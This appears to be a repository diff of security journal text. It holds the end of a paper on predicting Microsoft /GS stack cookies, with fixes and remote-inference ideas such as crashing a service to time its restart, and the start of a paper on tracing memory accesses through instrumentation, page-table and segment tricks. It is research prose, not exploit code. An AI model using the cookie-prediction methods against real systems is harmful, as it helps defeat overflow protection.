average difference is what leads to the lower 17 bits being so volatile. One
thing that's interesting about the difference between the estimated and actual
performance counter is that there appears to be a time oriented trend related
to how far off the estimates are. Due to the way that the samples were taken,
it's safe to assume that each sample is roughly equivalent to one second worth
of time passing (due to a sleep between sample collection). Further study of
this apparent relationship may yield better results in terms of estimating the
lower 17 bits of the low 32 bits of the performance counter. This is left for
future research.
5.5) Cookie
The cookie itself was never actually guessed during the course of sample
collection. The reason for this is tightly linked with the current inability
to accurately determine the lower 17 bits of the low 32 bits of the
performance counter. Comparing the percent accuracy of the cookie bits with
the percent accuracy of the low 32 bits of the performance counter yields a
very close match.
6) Improvements
Based on the results described in chapter , the author feels that there is
plenty of room for improvement in the way that GS cookies are currently
generated. It's clear that there is a need to ensure that there are 32 bits
of true entropy in the cookie. The following sections outline some potential
solutions to the entropy issue described in this document.
6.1) Better Entropy Sources
Perhaps the most obvious solution would be to simply improve the set of
entropy sources used to generate the cookie. In particular, the use of
sources with greater degrees of entropy, especially in the high order bits,
would be of great benefit. The challenge, however, is locating sources that
are easy to interact with and require very little overhead. For example, it's
not really feasible to have the GS cookie generator rely on the crypto API due
to the simple fact that this would introduce a dependency on the crypto API in
any application that was compiled with /GS. As this document has hopefully
shown, it's also a requirement that any additional entropy sources be
challenging to estimate externally at a future point in time.
Even though this is a viable solution, the author is not presently aware of
any additional entropy sources that would meet all three requirements. For
this reason, the author feels that this approach alone is insufficient to
solve the problem. If entropy sources are found which meet these
requirements, the author would love to hear about them.
6.2) Seeding High Order Bits
A more immediate solution to the problem at hand would involve simply ensuring
that the predictable high order bits are seeded with less predictable values.
However, additional entropy sources would be required in order to implement
this properly. At present, the only major source of entropy found in the GS
cookie is the low order bits of the performance counter. It would not be
sufficient to simply shift the low order bits of the performance counter into
the high order. Doing so would add absolutely no value by itself because it
would have no effect on the amount of true entropy in the cookie.
6.3) External Cookie Generation
An alternative solution that could combine the effects of the first two
solutions would be to change the GS implementation to generate the cookie
external to the binary itself. One of the most dangerous aspects of the GS
implementation is that it is statically linked and therefore would require a
recompilation of all affected binaries in the event that a weakness is found.
This fact alone should be scary. To help address both this problem and the
problem of weak entropy sources, it makes sense to consider a more dynamic
approach.
One example of a dynamic approach would be to have the GS implementation issue
a call into a kernel-mode routine that is responsible for generating GS
cookies. One place that this support could be added is in
NtQuerySystemInformation, though it's likely that a better place may exist.
Regardless of the specific routine, this approach would have the benefit of
moving the code used to generate the cookie out of the statically linked stub
that is inserted by the compiler. If any weakness were to be found in the
kernel-mode routine that generates the cookie, Microsoft could issue a patch
that would immediately affect all applications compiled to use GS. This would
solve some of the concerns relating to the static nature of GS.
Perhaps even better, this approach would grant greater flexibility to the
entropy sources that could be used in the generation of the cookie. Since the
routine would exist in kernel-mode, it would have the benefit of being able to
access additional sources of entropy that may be challenging or clumsy to
interact with from user-mode (though the counterpoint could certainly be made
as well). The kernel-mode routine could also accumulate entropy over time and
feed that back into the cookie, whereas the statically linked implementation
has no context with which to accumulate entropy. The accumulation of state
can also do more harm than good. It would be disingenuous to not admit that
this approach could also have its own set of problems. A poorly implemented
version of this solution might make it possible for a user to eliminate all
entropy by issuing a non-trivial number of calls to the kernel-mode routine.
There may be additional consequences that have not yet been perceived.
The impact on performance is also a big point of concern for any potential
change to the cookie generation path. At a high-level, a transition into
kernel-mode would seem concerning in terms of the amount of overhead that
might be added. However, it's important to note that the current
implementation of GS already transitions into kernel-mode to obtain some of
it's information. Specifically, performance counter information is obtained
through the system call NtQueryPerformanceCounter. Even more, this system
call results in an in operation on an I/O port that is used to query the
current performance counter.
Another important consideration is backward compatibility. If Microsoft were
to implement this solution, it would be necessary for applications compiled
with the new support to still be able benefit from GS on older platforms that
don't support the new kernel interface. To allow for backward compatibility,
Microsoft could implement a combination of all three solutions, whereby better
entropy sources and seeding of high order bits are used as a fallback in the
event that the kernel-mode interface is not present.
As it turns out, Microsoft does indeed have a mechanism that could allow them
to create a patch that would affect the majority of the binaries compiled with
recent versions of GS. This functionality is provided by exposing the address
of an image file's security cookie in its the load config data directory.
When the dynamic loader (ntdll) loads an image file, it checks to see if the
security cookie address in the load config data directory is non-NULL. If
it's not NULL, the loader proceeds to store the process-wide GS cookie in the
module-specific's GS cookie location. In this way, the __security_init_cookie
routine that's called by the image file's entry point effectively becomes a
no-operation because the cookie will have already been initialized. This
manner of setting the GS cookie for image files provides Microsoft with much
more flexibility. Rather than having to update all binaries compiled with GS,
Microsoft can simply update a single binary (ntdll.dll) if improvements need
to be made to the cookie generation algorithm. The following output shows a
sample of dumpbin /loadconfig on kernel32.dll:
Microsoft (R) COFF/PE Dumper Version 8.00.50727.42
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file c:\windows\system32\kernel32.dll
File Type: DLL
Section contains the following load config:
00000048 size
0 time date stamp
...
7C8836CC Security Cookie
7) Future Work
There is still additional work that can be done to further refine the
techniques described in this document. This chapter outlines some of the
major items that could be followed up on.
7.1) Improving Performance Counter Estimates
One area in particular that the author feels could benefit from further
research has to do with refining the technique used to calculate the
performance counter. A more thorough analysis of the apparent association
between time and the lower 17 bits of the performance counter is necessary.
This analysis would directly affect the ability to recover more cookie state
information, since the entropy of the lower 17 bits of the performance counter
is one of the only things standing in the way of obtaining the entire cookie.
7.2) Remote Attacks
The ability to apply the techniques described in this document in a remote
scenario would obviously increase the severity of the problem. In order to do
this, an attacker would need the ability to either infer or be able to
calculate some of the key elements that are used in the generation of a
cookie. This would rely on being able to determine things like the process
creation time, the process and thread identifier, and the system uptime. With
these values, it should be possible to predict the state of the cookie with
similar degrees of accuracy. Of course, methods of obtaining this information
remotely are not obvious.
One point of consideration that should be made is that even if it's not
possible to directly determine some of this information, it may be possible to
infer it. For instance, consider a scenario where a vulnerability in a
service is exposed remotely. There's nothing to stop an attacker from causing
the service to crash. In most cases, the service will restart at some
predefined point (such as 30 seconds after the crash). Using this approach,
an attacker could infer the creation time of the process based on the time
that the crash was generated. This isn't fool proof, but it should be
possible to get fairly close.
Determining process and thread identifier could be tricky, especially if the
system has been up for some time. The author is not aware of a general
purpose technique that could be used to determine this information remotely.
Fortunately, the process and thread identifier have very little effect on high
order bits.
The system uptime is an interesting one. In the past, there have been
techniques that could be used to estimate the uptime of the system through the
use of TCP timestamps and other network protocol anomalies. At the time of
this writing, the author is not aware of how prevalent or useful these
techniques are against modern operating systems. Should they still be
effective, they would represent a particularly useful way of obtaining a
system's uptime. If an attacker can obtain both the creation time of the
process and the uptime of the system, it's possible to calculate the tick
count and performance counter values with varying degrees of accuracy.
The performance counter will still pose a great challenge in the remote
scenario. The reliance on the performance frequency shouldn't be seen as an
unknown quantity. As far as the author is aware, the performance frequency on
modern processors is generally 3579545, though there may be certain power
situations that would cause it to be different.
It is also important to note that the current attack assumes that the load
time for an image that has a GS cookie is equivalent to the initial thread's
creation time. For example, if a DLL were loaded much later in process
execution, such as through instantiating a COM object in Internet Explorer, it
would not be possible to assume that initial thread creation time is equal to
the system time that was obtained when the DLL's GS cookie was generated.
This brings about an interesting point for the remote scenario, however. If
an attacker can control the time at which a DLL is loaded, it may be possible
for them to infer the value of system time that is used without even having to
directly query it. One example of this would be in the context of internet
explorer, where the client's date and time functionality might be abused to
obtain this information.
8) Conclusion
The ability to reduce the amount of effective entropy in a GS cookie can
improve an attacker's chances of guessing the cookie. This paper has
described two techniques that may be used to calculate or infer the values of
certain bits in a GS cookie. The first approach involves a local attacker's
ability to collect information that makes it possible to calculate, with
pretty good accuracy, the values of the entropy sources that were used at the
time that a cookie was generated. The second approach describes the potential
for abusing the limited entropy associated with boot start services.
While the results shown in this paper do not represent a complete break of GS,
they do hint toward a general weakness in the way that GS cookies are
generated. This is particularly serious given the fact that GS is a compile
time solution. If the techniques described in this document are refined, or
new and improved techniques are identified, a complete break of GS would
require the recompilation of all affected binaries. The implications of this
should be obvious. The ability to reliably predict the value of a GS cookie
would effectively nullify any benefits that GS adds. It would mean that all
stack-based buffer overflows would immediately become exploitable.
To help contribute to the improvement of GS, a few different solutions were
described that could either partially or wholly address some of the weakness
that were identified. The most interesting of these solutions involves
modifying the GS implementation to make use of a external cookie generator,
such as the kernel. Going this route would ensure that any weaknesses found
in the cookie generation algorithm could be simply addressed through a patch
to the kernel. This is much more reasonable than expecting all existing GS
enabled binaries to be recompiled.
It's unclear whether the techniques presented in this paper will have any
appreciable effect on future exploits. Only time will tell.
References
[1] Cowan, Crispin et al. StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks.
http://www.usenix.org/publications/library/proceedings/sec98/full_papers/cowan/cowan_html/cowan.html; accessed 3/18/2007.
[2] Etoh, Hiroaki. GCC extension for protecting applications from stack-smashing attacks.
http://www.research.ibm.com/trl/projects/security/ssp/; accessed 3/18/2007.
[3] eEye. Memory Retrieval Vulnerabilities.
http://research.eeye.com/html/Papers/download/eeyeMRV-Oct2006.pdf; accessed 3/18/2007.
[4] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server
http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf; accessed 3/18/2007.
[5] Microsoft Corporation. /GS (Buffer Security Check).
http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx; accessed 3/18/2007.
[6] Microsoft Corporation. /SAFESEH (Image has Safe Exception Handlers).
http://msdn2.microsoft.com/en-us/library/9a89h429(VS.80).aspx; accessed 3/18/2007.
[7] Microsoft Corporation. QueryPerformanceFrequency Function.
http://msdn2.microsoft.com/en-us/library/ms644905.aspx; accessed 3/18/2007
[8] Microsoft Corporation. QueryPerformanceCounter Function.
http://msdn2.microsoft.com/en-us/library/ms644904.aspx; accessed 3/18/2007
[9] Ren, Chris et al. Microsoft Compiler Flaw Technical Note
http://www.cigital.com/news/index.php?pg=art&artid=70; accessed 3/18/2007.
[10] Whitehouse, Ollie. Analysis of GS protections in Windows Vista
http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf; accessed 3/20/2007.

800
uninformed/7.2.txt Normal file
View File

@ -0,0 +1,800 @@
Memalyze: Dynamic Analysis of Memory Access Behavior in Software
skape
mmiller@hick.org
4/2007
Abstract
This paper describes strategies for dynamically analyzing an application's
memory access behavior. These strategies make it possible to detect when a
read or write is about to occur at a given location in memory while an
application is executing. An application's memory access behavior can provide
additional insight into its behavior. For example, it may be able to provide
an idea of how data propagates throughout the address space. Three individual
strategies which can be used to intercept memory accesses are described in
this paper. Each strategy makes use of a unique method of intercepting memory
accesses. These methods include the use of Dynamic Binary Instrumentation
(DBI), x86 hardware paging features, and x86 segmentation features. A
detailed description of the design and implementation of these strategies for
32-bit versions of Windows is given. Potential uses for these analysis
techniques are described in detail.
1) Introduction
If software analysis had a holy grail, it would more than likely be centered
around the ability to accurately model the data flow behavior of an
application. After all, applications aren't really much more than
sophisticated data processors that operate on varying sets of input to produce
varying sets of output. Describing how an application behaves when it
encounters these varying sets of input makes it possible to predict future
behavior. Furthermore, it can provide insight into how the input could be
altered to cause the application to behave differently. Given these benefits,
it's only natural that a discipline exists that is devoted to the study of
data flow analysis.
There are a two general approaches that can be taken to perform data flow
analysis. The first approach is referred to as static analysis and it
involves analyzing an application's source code or compiled binaries without
actually executing the application. The second approach is dynamic analysis
which, as one would expect, involves analyzing the data flow of an application
as it executes. The two approaches both have common and unique benefits and
no argument will be made in this paper as to which may be better or worse.
Instead, this paper will focus on describing three strategies that may be used
to assist in the process of dynamic data flow analysis.
The first strategy involves using Dynamic Binary Instrumentation (DBI) to
rewrite the instruction stream of the executing application in a manner that
makes it possible to intercept instructions that read from or write to memory.
Two well-known examples of DBI implementations that the author is familiar
with are DynamoRIO and Valgrind[3, 11]. The second strategy that will be
discussed involves using the hardware paging features of the x86 and x64
architectures to trap and handle access to specific pages in memory. Finally,
the third strategy makes use of the segmentation features included in the x86
architecture to trap memory accesses by making use of the null selector.
Though these three strategies vary greatly, they all accomplish the same goal
of being able to intercept memory accesses within an application as it
executes.
The ability to intercept memory reads and writes during runtime can support
research in additional areas relating to dynamic data flow analysis. For
example, the ability to track what areas of code are reading from and writing
to memory could make it possible to build a model for the data propagation
behaviors of an application. Furthermore, it might be possible to show with
what degree of code-level isolation different areas of memory are accessed.
Indeed, it may also be possible to attempt to validate the data consistency
model of a threaded application by investigating the access behaviors of
various regions of memory which are referenced by multiple threads. These are
but a few of the many potential candidates for dynamic data flow analysis.
This paper is organized into three sections. Section 2 gives an introduction
to three different strategies for facilitating dynamic data flow analysis.
Section 3 enumerates some of the potential scenarios in which these strategies
could be applied in order to render some useful information about the data
flow behavior of an application. Finally, section 4 describes some of the
previous work whose concepts have been used as the basis for the research
described herein.
2) Strategies
This section describes three strategies that can be used to intercept runtime
memory accesses. The strategies described herein do not rely on any static
binary analysis. Techniques that do make use of static binary analysis are
outside of the scope of this paper.
2.1) Dynamic Binary Instrumentation
Dynamic Binary Instrumentation (DBI) is a method of analyzing the behavior of
a binary application at runtime through the injection of instrumentation code.
This instrumentation code executes as part of the normal instruction stream
after being injected. In most cases, the instrumentation code will be
entirely transparent to the application that it's been injected to. Analyzing
an application at runtime makes it possible to gain insight into the behavior
and state of an application at various points in execution. This highlights
one of the key differences between static binary analysis and dynamic binary
analysis. Rather than considering what may occur, dynamic binary analysis has
the benefit of operating on what actually does occur. This is by no means
exhaustive in terms of exercising all code paths in the application, but it
makes up for this by providing detailed insight into an application's concrete
execution state.
The benefits of DBI have made it possible to develop some incredibly advanced
tools. Examples where DBI might be used include runtime profiling,
visualization, and optimization tools. DBI implementations generally fall
into two categories: light-weight or heavy-weight. A light-weight DBI
operates on the architecture-specific instruction stream and state when
performing analysis. A heavy-weight DBI operates on an abstract form of the
instruction stream and state. An example a heavy-weight DBI is Valgrind which
performs analysis on an intermediate representation of the machine state[11,
7]. An example of a light-weight DBI is DynamoRIO which performs analysis
using the architecture-specific state[3]. The benefit of a heavy-weight DBI
over a light-weight DBI is that analysis code written against the intermediate
representation is immediately portable to other architectures, whereas
light-weight DBI analysis implementations must be fine-tuned to work with
individual architectures. While Valgrind is a novel and interesting
implementation, it is currently not supported on Windows. For this reason,
attention will be given to DynamoRIO for the remainder of this paper. There are
many additional DBI frameworks and details, but for the sake of limiting scope
these will not be discussed. The reader should consult reference material to
learn more about this subject[11].
DynamoRIO is an example of a DBI framework that allows custom instrumentation
code to be integrated in the form of dynamic libraries. The tool itself is a
combination of Dynamo, a dynamic optimization engine developed by researchers
at HP, and RIO, a runtime introspection and optimization engine developed by
MIT. The fine-grained details of the implementation of DynamoRIO are outside
of the scope of this paper, but it's important to understand the basic
concepts[2].
At a high-level, figure 1 from Transparent Binary Optimization provides a
great visualization of the process employed by Dynamo[2]. In concrete terms,
Dynamo works by processing an instruction stream as it executes. To
accomplish this, Dynamo assumes responsibility for the execution of the
instruction stream. It uses a disassembler to identify the point of the next
branch instruction in the code that is about to be executed. The set of
instructions disassembled is referred to as a fragment (although, it's more
commonly known as a basic block). If the target of the branch instruction is
in Dynamo's fragment cache, it executes the (potentially optimized) code in
the fragment cache. When this code completes, it returns control to Dynamo to
disassemble the next fragment. If at some point Dynamo encounters a branch
target that is not in its fragment cache, it will add it to the fragment cache
and potentially optimize it. This is the perfect opportunity for
instrumentation code to be injected into the optimized fragment that is
generated for a branch target. Injecting instrumentation code at this level
is entirely transparent to the application. While this is an
oversimplification of the process used by DynamoRIO, it should at least give
some insight into how it functions.
One of the best features of DynamoRIO from an analysis standpoint is that it
provides a framework for inserting instrumentation code during the time that a
fragment is being inserted into the fragment cache. This is especially useful
for the purposes of intercepting memory accesses within an application. When
a fragment is being created, DynamoRIO provides analysis libraries with the
instructions that are to be included in the fragment that is generated. To
optimize for performance, DynamoRIO provides multiple levels of disassembly
information. At the most optimized level, only very basic information
about the instructions is provided. At the least optimized level, very
detailed information about the instructions and their operands can be
obtained. Analysis libraries are free to control the level of information
that they retrieve. Using this knowledge of DynamoRIO, it is now possible
to consider how one might design an analysis library that is able to
intercept memory reads and writes while an application is executing.
2.1.1) Design
DBI, and DynamoRIO in particular, make designing a solution that can intercept
memory reads and writes fairly trivial. The basic design involves having an
analysis library that scans the instructions within a fragment that is being
created. When an instruction that accesses memory is encountered,
instrumentation code can be inserted prior to the instruction. The
instrumentation code can be composed of instructions that notify an
instrumentation function of the memory operand that is about to be read from
or written to. This has the effect of causing the instrumentation function to
be called when the fragment is executed. These few steps are really all that
it takes instrument the memory access behavior of an application as it
executes using DynamoRIO.
2.1.2) Implementation
The implementation of the DBI approach is really just as easy as the design
description makes it sound. To cooperate with DynamoRIO, an analysis library
must implement a well-defined routine named dynamorio_basic_block which is
called by DynamoRIO when a fragment is being created. This routine is passed
an instruction list which contains the set of instructions taken from the
native binary. Using this instruction list, the analysis library can make a
determination as to whether or not any of the operands of an instruction
either explicitly or implicitly reference memory. If an instruction does
access memory, then instrumentation code must be inserted.
Inserting instrumentation code with DynamoRIO is a pretty painless process.
DynamoRIO provides a number of macros that encapsulate the process of creating
and inserting instructions into the instruction list. For example,
INSTR_CREATE_add will create an add instruction with a specific set of arguments
and instrlist_meta_preinsert will insert an instruction prior to another
instruction within the instruction list.
A proof of concept implementation is included with the source code provided
along with this paper.
2.1.3) Considerations
This approach is particularly elegant thanks to the concepts of dynamic binary
instrumentation and to DynamoRIO itself for providing an elegant framework
that supports inserting instrumentation code into the fragment cache. Since
DynamoRIO is explicitly designed to be a runtime optimization engine, the fact
that the instrumentation code is cached within the fragment cache means that
it gains the benefits of DynamoRIO's fragment optimization algorithms. When
compared to alternative approaches, this approach also has significantly less
overhead once the fragment cache begins to become populated. This is because
all of the instrumentation code is placed entirely inline with the application
code that is executing rather than having to rely on alternative means of
interrupting the normal course of program execution. Still, this approach is
not without its set of considerations. Some of these considerations are
described below:
1. Requires the use of a disassembler
DynamoRIO depends on its own internal disassembler. This can be a source
of problems and limitations.
2. Self-modifying and dynamic code
Self-modifying and dynamically generated code can potentially cause problems
with DynamoRIO.
3. DynamoRIO is closed source
While this has nothing to do with the actual concept, the fact that
DynamoRIO is closed source can be limiting in the event that there are
issues with DynamoRIO itself.
2.2) Page Access Interception
The hardware paging features of the x86 and x64 architectures represent a
potentially useful means of obtaining information about the memory access
behavior of an application. This is especially true due to the well-defined
actions that the processor takes when a reference is made to a linear address
whose physical page is either not present or has had its access restricted.
In these cases, the processor will assert the page fault interrupt (0x0E) and
thereby force the operating system to attempt to gracefully handle the virtual
memory reference. In Windows, the page fault interrupt is handled by
nt!KiTrap0E. In most cases, nt!KiTrap0E will issue a call into
nt!MmAccessFault which is responsible for making a determination about the
nature of the memory reference that occurred. If the memory reference fault
was a result of an access restriction, nt!MmAccessFault will return an access
violation error code (0xC0000005). When an access violation occurs, an
exception record is generated by the kernel and is then passed to either the
user-mode exception dispatcher or the kernel-mode exception dispatcher
depending on which mode the memory access occurred in. The job of the
exception dispatcher is to give a thread an opportunity to gracefully recover
from the exception. This is accomplished by providing each of the registered
or vectored exception handlers with the exception information that was
collected when the page fault occurred. If an exception handler is able to
recover, execution of the thread can simply restart where it left off. Using
the principles outlined above, it is possible to design a system that is
capable of both trapping and handling memory references to specific pages in
memory during the course of normal process execution.
2.2.1) Design
The first step that must be taken to implement this system involves
identifying a method that can be used to trap references to arbitrary pages in
memory. Fortunately, previous work has done much to identify some of the
different approaches that can be taken to accomplish this[8, 4]. For the purposes
of this paper, one of the most useful approaches centers around the ability to
define whether or not a page is restricted from user-mode access. This is
controlled by the Owner bit in a linear address' page table entry (PTE)[5]. When
the Owner bit is set to 0, the page can only be accessed at privilege level 0.
This effectively restricts access to kernel-mode in all modern operating
systems. Likewise, when the Owner bit is set to 1, the page can be accessed
from all privilege levels. By toggling the Owner bit to 0 in the PTEs
associated with a given set of linear addresses, it is possible to trap all
user-mode references to those addresses at runtime. This effectively solves
the first hurdle in implementing a solution to intercept memory access
behavior.
Using the approach outlined above, any reference that is made from user-mode
to a linear address whose PTE has had the Owner bit set to 0 will result in an
access violation exception being passed to the user-mode exception dispatcher.
This exception must be handled by a custom exception handler that is able to
distinguish transient access violations from ones that occurred as a result of
the Owner bit having been modified. This custom exception handler must also
be able to recover from the exception in a manner that allows execution to
resume seamlessly. Distinguishing exceptions is easy if one assumes that the
custom exception handler has knowledge in advance of the address regions that
have had their Owner bit modified. Given this assumption, the act of
distinguishing exceptions is as simple as seeing if the fault address is
within an address region that is currently being monitored. While
distinguishing exceptions may be easy, being able to gracefully recovery is an
entirely different matter.
To recover and resume execution with no noticeable impact to an application
means that the exception handler must have a mechanism that allows the
application to access the data stored in the pages whose virtual mappings have
had their access restricted to kernel-mode. This, of course, would imply that
the application must have some way, either direct or indirect, to access the
contents of the physical pages associated with the virtual mappings that have
had their PTEs modified. The most obvious approach would be to simply toggle
the Owner bit to permit user-mode access. This has many different problems,
not the least of which being that doing so would be expensive and would not
behave properly in multi-threaded environments (memory accesses could be
missed or worse). An alternative to updating the Owner bit would be to have a
device driver designed to provide support to processes that would allow them
to read the contents of a virtual address at privilege level 0. However,
having the ability to read and write memory through a driver means nothing if
the results of the operation cannot be factored back into the instruction that
triggered the exception.
Rather than attempting to emulate the read and write access, a better approach
can be used. This approach involves creating a second virtual mapping to the
same set of physical pages described by the linear addresses whose PTEs were
modified. This second virtual mapping would behave like a typical user-mode
memory mapping. In this way, the process' virtual address space would contain
two virtual mappings to the same set of physical pages. One mapping, which
will be referred to as the original mapping, would represent the user-mode
inaccessible set of virtual addresses. The second mapping, which will be
referred to as the mirrored mapping, would be the user-mode accessible set of
virtual addresses. By mapping the same set of physical pages at two
locations, it is possible to transparently redirect address references at the
time that exceptions occur. An important thing to note is that in order to
provide support for mirroring, a disassembler must be used to figure out which
registers need to be modified.
To better understand how this could work, consider a scenario where an
application contains a mov [eax], 0x1 instruction. For the purposes of this
example, assume that the eax register contains an address that is within the
original mapping as described above. When this instruction executes, it will
lead to an access violation exception being generated as a result of the PTE
modifications that were made to the original mapping. When the exception
handler inspects this exception, it can determine that the fault address was
one that is contained within the original mapping. To allow execution to
resume, the exception handler must update the eax register to point to the
equivalent address within the mirrored region. Once it has altered the value
of eax, the exception handler can tell the exception dispatcher to continue
execution with the now-modified register information. From the perspective of
an executing application, this entire operation will occur transparently.
Unfortunately, there's still more work that needs to be done in order to
ensure that the application continues to execute properly after the exception
dispatcher continues execution.
The biggest problem with modifying the value of a register to point to the
mirrored address is that it can unintentionally alter the behavior of
subsequent instructions. For example, the application may not function
properly if it assumes that it can access other non-mirrored memory addresses
relative to the address stored within eax. Not only that, but allowing eax to
continue to be accessed through the mirrored address will mean that subsequent
reads and writes to memory made using the eax register will be missed for the
time that eax contains the mirrored address.
In order to solve this problem, it is necessary to come up with a method of
restoring registers to their original value after the instruction executes.
Fortunately, the underlying architecture has built-in support that allows a
program to be notified after it has executed an instruction. This support is
known as single-stepping. To make use of single-stepping, the exception
handler can set the trap flag (0x100) in the saved value of the eflags
register. When execution resumes, the processor will generate a single step
exception after the original instruction executes. This will result in the
custom exception handler being called. When this occurs, the custom exception
handler can determine if the single step exception occurred as a result of a
previous mirroring operation. If it was the result of a mirroring operation,
the exception handler can take steps to restore the appropriate register to
its original value.
Using these four primary steps, a complete solution to the problem of
intercepting memory accesses can be formed. First, the Owner bit of the PTEs
associated with a region of virtual memory can be set to 0. This will cause
user-mode references to this region to generate an access violation exception.
Second, an additional mapping to the set of physical pages described the
original mapping can be created which is accessible from user-mode. Third,
any access violation exceptions that reach the custom exception handler can be
inspected. If they are the result of a reference to a region that is being
tracked, the register contents of the thread context can be adjusted to
reference the user-accessible mirrored mapping. The thread can then be
single-stepped so that the fourth and final step can be taken. When a
single-step exception is generated, the custom exception handler can restore
the original value of the register that was modified. When this is complete,
the thread can be allowed to continue as if nothing had happened.
2.2.2) Implementation
An implementation of this approach is included with the source code released
along with this paper. This implementation has two main components: a
kernel-mode driver and a user-mode DLL. The kernel-mode driver provides a
device object interface that allows a user-mode process to create a mirrored
mapping of a set of physical pages and to toggle the Owner bit of PTEs
associated with address regions. The user-mode DLL is responsible for
implementing a vectored exception handler that takes care of processing access
violation exceptions by mirroring the address references to the appropriate
mirrored region. The user-mode DLL also exposes an API that allows
applications to create a memory mirror. This abstracts the entire process and
makes it simple to begin tracking a specific memory region. The API also
allows applications to register callbacks that are notified when an address
reference occurs. This allows further analysis of the memory access behavior
of the application.
2.2.3) Considerations
While this approach is most definitely functional, it comes with a number of
caveats that make it sub-optimal for any sort of large-scale deployment. The
following considerations are by no means all-encompassing, but some of the
more important ones have been enumerated below:
1. Unsafe modification of PTEs
It is not safe to modify PTEs without acquiring certain locks.
Unfortunately, these locks are not exported and are therefore inaccessible
to third party drivers.
2. Large amount of overhead
The overhead associated with having to take a page fault and pass the
exception on to the be handled by user-mode is substantial. Memory access
time with respect to the application could jump from nanoseconds to micro
or even milli seconds.
3. Requires the use of a disassembler
Since this approach relies on mirroring memory references from one virtual
address to another, a disassembler has to be used to figure out which
registers need to be modified with the mirrored address. Any time a
disassembler is needed is an indication that things are getting fairly
complicated.
4. Cannot track memory references to all addresses
The fact that this approach relies on locking physical pages prevents it
from feasibly tracking all memory references. In addition, because the
thread stack is required to be valid in order to dispatch exceptions, it's
not possible to track reads and writes to thread stacks using this
approach.
2.3) Null Segment Interception
Segmentation is an extremely old feature of the x86 architecture. Its purpose
has been to provide software with the ability to partition the address space
into distinct segments that can be referenced through a 16-bit segment
selector. Segment selectors are used to index either the Global Descriptor
Table (GDT) or the Local Descriptor Table (LDT). Segment descriptors convey
information about all or a portion of the address space. On modern 32-bit
operating systems, segmentation is used to set up a flat memory model
(primarily only used because there is no way to disable it). This is further
illustrated by the fact that the x64 architecture has effectively done away
with the ES, DS, and SS segment registers in 64-bit mode. While segment
selectors are primarily intended to make it possible to access memory, they
can also be used to prevent access to it.
2.3.1) Design
Segmentation is one of the easiest ways to trap memory accesses. The majority
of instructions which reference memory implicitly use either the DS or ES
segment registers to do so. The one exception to this rule are instructions
that deal with the stack. These instructions implicitly use the SS segment
register. There are a few different ways one can go about causing a general
protection fault when accessing an address relative to a segment selector, but
one of the easiest is to take advantage of the null selector. The null
selector, 0x0, is a special segment selector that will always cause a general
protection fault when using it to reference memory. By loading the null
selector into DS, for example, the mov [eax], 0x1 instruction would cause a
general protection fault when executed. Using the null selector solves the
problem of being able to intercept memory accesses, but there still needs to
be some mechanism to allow the application to execute normally after
intercepting the memory access.
When a general protection fault occurs in user-mode, the kernel generates an
access violation exception and passes it off to the user-mode exception
dispatcher in much the same way as was described in 2.2. Registering a custom
exception handler makes it possible to catch this exception and handle it
gracefully. To handle this exception, the custom exception handler must
restore DS and ES segment registers to valid segment selectors by updating the
thread context record associated with the exception. On 32-bit versions of
Windows, the segment registers should be restored to 0x23. Once the the
segment registers have been updated, the exception dispatcher can be told to
continue execution. However, before this happens, there is an additional step
that must be taken.
It is not enough to simply restore the segment registers and then continue
execution. This would lead to subsequent reads and writes being missed as a
result of the DS and ES segment registers no longer pointing to the null
selector. To address this, the custom exception handler should toggle the
trap flag in the context record prior to continuing execution. Setting the
trap flag will cause the processor to generate a single step exception after
the instruction that generated the general protection fault executes. This
single step exception can then be processed by the custom exception handler to
reset the DS and ES segment registers to the null selector. After the segment
registers have been updated, the trap flag can be disabled and execution can
be allowed to continue. By following these steps, the application is able to
make forward progress while also making it possible to trap all memory reads
and writes that use the DS and ES segment registers.
2.3.2) Implementation
The implementation for this approach involves registering a vectored exception
handler that is able to handle the access violation and single step exceptions
that are generated. Since this approach relies on setting the segment
registers DS and ES to the null selector, an implementation must take steps to
update the segment register state for each running thread in a process and for
all new threads as they are created. Updating the segment register state for
running threads involves enumerating running threads in the calling process
using the toolhelp library. For each thread that is not the calling thread,
the SetThreadContext routine can be used to update segment registers. The
calling thread can update the segment registers using native instructions. To
alter the segment registers for new threads, the DLLTHREADATTACH notification
can be used. Once all threads have had their DS and ES segment registers
updated, memory references will immediately begin causing access violation
exceptions.
When these access violation exceptions are passed to the vectored exception
handler, appropriate steps must be taken to restore the DS and ES segment
registers to a valid segment selector, such as 0x23. This is accomplished by
updating the SegDs and SegEs segment registers in the CONTEXT structure that
is passed in association with an exception. In addition to updating these
segment registers, the trap flag (0x100) must also be set in the EFlags
register so that the DS and ES segment registers can be restored to the null
selector in order to trap subsequent memory accesses. Setting the trap flag
will lead to a single step exception after the instruction that generated the
access violation executes. When the single step exception is received, the
SegDs and SegEs segment registers can be restored to the null selector.
These few steps capture the majority of the implementation, but there is a
specific Windows nuance that must be handled in order for this to work right.
When the Windows kernel returns to a user-mode process after a system call has
completed, it restores the DS and ES segment selectors to their normal value
of 0x23. The problem with this is that without some way to reset the segment
registers to the null selector after a system call returns, there is no way to
continue to track memory accesses after a system call. Fortunately, there is
a relatively painless way to reset the segment registers after a system call
returns. On Windows XP SP2 and more recent versions of Windows, the kernel
determines where to transfer control to after a system call returns by looking
at the function pointer stored in the shared user data memory mapping.
Specifically, the SystemCallReturn attribute at 0x7ffe0304 holds a pointer to
a location in ntdll that typically contains just a ret instruction as shown
below:
0:001> u poi(0x7ffe0304)
ntdll!KiFastSystemCallRet:
7c90eb94 c3 ret
7c90eb95 8da42400000000 lea esp,[esp]
7c90eb9c 8d642400 lea esp,[esp]
Replacing this single ret instruction with code that resets the DS and ES
registers to the null selector followed by a ret instruction is enough to make
it possible to continue to trap memory accesses after a system call returns.
However, this replacement code should not take these steps if a system call
occurs in the context of the exception dispatcher, as this could lead to a
nesting issue if anything in the exception dispatcher references memory, which
is very likely.
An implementation of this approach is included with the source code provided
along with this paper.
2.3.3) Considerations
There are a few considerations that should be noted about this approach. On
the positive side, this approach is unique when compared to the others
described in this paper due to the fact that, in principle, it should be
possible to use it to trap memory accesses in kernel-mode, although it is
expected that the implementation may be much more complicated. This approach
